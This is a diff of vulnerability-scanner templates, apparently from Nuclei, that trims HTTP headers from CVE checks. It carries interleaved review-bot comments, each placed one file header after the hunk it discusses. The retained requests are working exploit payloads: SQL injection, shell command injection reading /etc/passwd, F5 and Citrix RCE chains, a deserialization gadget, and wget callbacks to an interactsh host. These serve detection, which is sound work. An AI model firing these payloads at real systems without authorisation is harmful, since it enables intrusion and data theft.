a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index 8f6e44259c..835ccc29ed 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml 
@@ -14,30 +14,16 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 269 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 - Accept: */* - Accept-Language: en-US,en;q=0.9 - Connection: close + ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="action" @@ -52,11 +38,6 @@ requests: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 - Connection: close extractors: - type: regex diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index f5a620db25..def510535d 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml 
@@ -15,14 +15,6 @@ requests: - | GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - DNT: 1 - Connection: close - Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n - Upgrade-Insecure-Requests: 1 matchers: - type: word diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml index 2ab9a084ee..6107fbb57a 100644 --- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -15,8 +15,6 @@ requests: POST /dfsms/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Connection: close - Content-Length: 66 username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index 54c13f3586..e55a8ef228 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -26,11 +26,13 @@ requests: - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release" - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license" - "{{BaseURL}}/hsqldb%0a" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" 
@@ -38,41 +40,35 @@ requests: - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}" - "HSQL Database Engine Servlet" condition: or - part: body + - raw: - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=create%20cli%20alias%20private%20list%20command%20bash - | POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=list%20%2Ftmp%2Fnonexistent - | POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 Host: {{Hostname}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) command=delete%20cli%20alias%20private%20list + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "h3ll0_w0Rld" diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 70fc14a6ca..1ca340cabb 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -14,9 +14,6 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* matchers: - type: word diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 09cee1e759..d88be8f1b8 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml 
@@ -15,14 +15,8 @@ requests: - | POST /api/jsonws/invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Content-Length: 4938 - Accept: */* - Accept-Language: en - Connection: close Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData - X-Requested-With: XMLHttpRequest cmd2: §command§ cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap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requests: regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" - condition: or - part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 4a7f5a15fd..653c89b7d0 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -14,23 +14,18 @@ requests: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index 3ff654e589..b63ac93a82 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml 
@@ -15,7 +15,6 @@ requests: - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml X-NITRO-USER: xpyZxwy6 X-NITRO-PASS: xWXHUJ56 @@ -25,30 +24,18 @@ requests: - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -59,9 +46,6 @@ requests: - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -70,20 +54,14 @@ requests: cookie-reuse: true - - # Using cookie-reuse to maintain session between each request, same as browser. - extractors: - type: regex - name: randkey + name: randkey # dynamic variable part: body internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - # Using rand_key as dynamic variable to make use of extractors at run time. - - matchers: - type: regex regex: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 874d9e5856..1c08f85a0f 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml 
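Review bot: The last hunk in this file (`@@ -70,20 +54,14 @@`) removes the two comments that explained why `cookie-reuse: true` is set and what the `randkey` extractor is for, leaving only the terse `name: randkey # dynamic variable`; the chain of requests that authenticates with `X-NITRO-USER`/`X-NITRO-PASS` and then requests `/rapi/filedownload` is hard to follow without that context. Keep one line next to the option, e.g. `cookie-reuse: true  # the session cookie set by the earlier requests is needed by the later ones`, and make the extractor comment say what the flag does, e.g. `internal: true  # value is only substituted into later requests, not reported`, which is what the removed comment described. The inline comment should also have two spaces before `#` (`name: randkey  # dynamic variable`) to match yamllint's default.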
@@ -5,23 +5,15 @@ info: author: dwisiswant0 severity: high tags: cve,cve2020,citrix - description: | - Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. - reference: - - https://support.citrix.com/article/CTX276688 + description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. + reference: https://support.citrix.com/article/CTX276688 requests: - raw: - | GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close Cookie: startupapp=st - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: @@ -29,10 +21,12 @@ requests: words: - "" part: body + - type: word words: - "application/x-java-jnlp-file" part: header + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index 0b7f3c8ed7..da3aec26dd 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -15,9 +15,6 @@ requests: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: */* - Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index e5a9eb428d..0a036e89a5 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml 
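Review bot: Collapsing `description: |` into a single plain scalar in this hunk trades one problem for another: the literal block appended a trailing newline to the value, but the replacement is a line well over 200 characters. A folded block scalar gives the same single-line runtime value without either issue: `description: >-` followed by the wrapped sentence; the same applies to the CVE-2021-28150 description change further down in this commit. Separately, `reference` becomes a plain string here while the CVE-2021-28150 hunk keeps it as a list; if the loader accepts both forms (the commit appears to rely on that), the list form is the one used elsewhere in this commit, so `reference:` / `  - https://support.citrix.com/article/CTX276688` would be more consistent.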
@@ -14,10 +14,6 @@ requests: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} matchers: diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index db8408c9f2..f244463bf9 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -12,8 +12,6 @@ requests: path: - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2" - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 217ef7fa40..35aef60dbd 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -21,9 +21,7 @@ requests: - | POST /storfs-asup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Content-Length: 78 Content-Type: application/x-www-form-urlencoded action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 6b175dab6d..a419448255 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -24,11 +24,7 @@ requests: Host: {{Hostname}} Cookie: lang=8; url=ping.html; mobile=false; Referer: {{BaseURL}}/info.html - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 178 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index cdd020bddc..83f46804d2 100644 --- a/cves/2021/CVE-2021-21307.yaml 
+++ b/cves/2021/CVE-2021-21307.yaml @@ -16,24 +16,13 @@ requests: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 8 imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 790 imgSrc= @@ -62,13 +51,11 @@ requests: + - | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index 7aecfc64a1..adec07c32f 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -18,7 +18,6 @@ requests: - | POST /wp-json/buddypress/v1/signup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/json; charset=UTF-8 { diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index 92ba471ccb..e7337d9775 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml 
@@ -14,7 +14,6 @@ requests: POST /casa/nodes/thumbprints HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ["127.0.0.1:443/ui/"] diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index aa4c7001a1..ad807159dc 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -19,8 +19,6 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/json - Content-Length: 86 - Connection: close {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index 51523e26ab..b4e407b056 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -16,10 +16,8 @@ requests: - | POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} content-type: application/json - Connection: close {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"} diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 8f67d63102..7fb471bc6f 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -17,7 +17,6 @@ requests: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 47 action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- - diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 40bbfa226a..9b24744f57 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml 
@@ -13,13 +13,7 @@ requests: - | POST /run HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 173 - Connection: close {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 23c3e6d3dc..ca62a13683 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -15,10 +15,7 @@ requests: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 1006 - Connection: close { "type":"index", diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3044206eb1..cef67180f6 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -19,42 +19,38 @@ requests: - | POST /webtools/control/SOAPService HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 - Connection: close Content-Type: application/xml - Content-Length: 910 - - - - - - - - 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 - - - - - - - - + + + + + + + + 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 + + + + + + + + - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "OFBiz.Visitor=" part: header + - type: word words: - "deserializing" diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index 09c5027755..cba085815d 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml 
@@ -16,18 +16,11 @@ requests: GET /assets/app/something/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + - | GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 extractors: - type: regex diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index cc21b4ced3..b16d0b19a0 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -4,8 +4,7 @@ info: name: Hongdian Sensitive Information author: gy741 severity: medium - description: | - Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 
@@ -16,26 +15,12 @@ requests: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 0b2c9fed15..34b2b86083 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml 
@@ -16,36 +16,18 @@ requests: - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 0ad974afd4..46e6805abe 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml 
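Review bot: Both raw requests in this hunk lose their `Content-Type: application/x-www-form-urlencoded` header while keeping the form-encoded body `op_type=ping&destination=%3Bid`; the rest of this commit assumes the runner recomputes `Content-Length` for raw requests, but nothing adds a `Content-Type`, so a CGI that only parses POST parameters when that header is present would never see them and the check would silently report nothing. The other form POSTs touched by this commit (CVE-2021-30461, CVE-2021-21307) keep the header, so the removal here looks accidental; restore it below `Origin: {{BaseURL}}` in both requests: `Content-Type: application/x-www-form-urlencoded`. Dropping the fixed `Content-Length: 85` itself is fine. The form POSTs in the CVE-2020-25506 and CVE-2020-26919 hunks lack the header on both sides of the diff, so that is pre-existing rather than introduced here, but it is worth the same fix.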
@@ -14,21 +14,15 @@ requests: - | PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en Accept: */* - Content-Length: 23 Content-Type: application/json - Connection: close {"Password":"{{randstr}}"} - | POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Content-Length: 50 Content-Type: application/json - Connection: close {"UserName":"Administrator","Password":"{{randstr}}"} diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 98d90910a3..6de9e167ab 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -14,11 +14,7 @@ requests: POST /index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 6e406ccb7c..8a0135ebcb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -15,10 +15,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} 
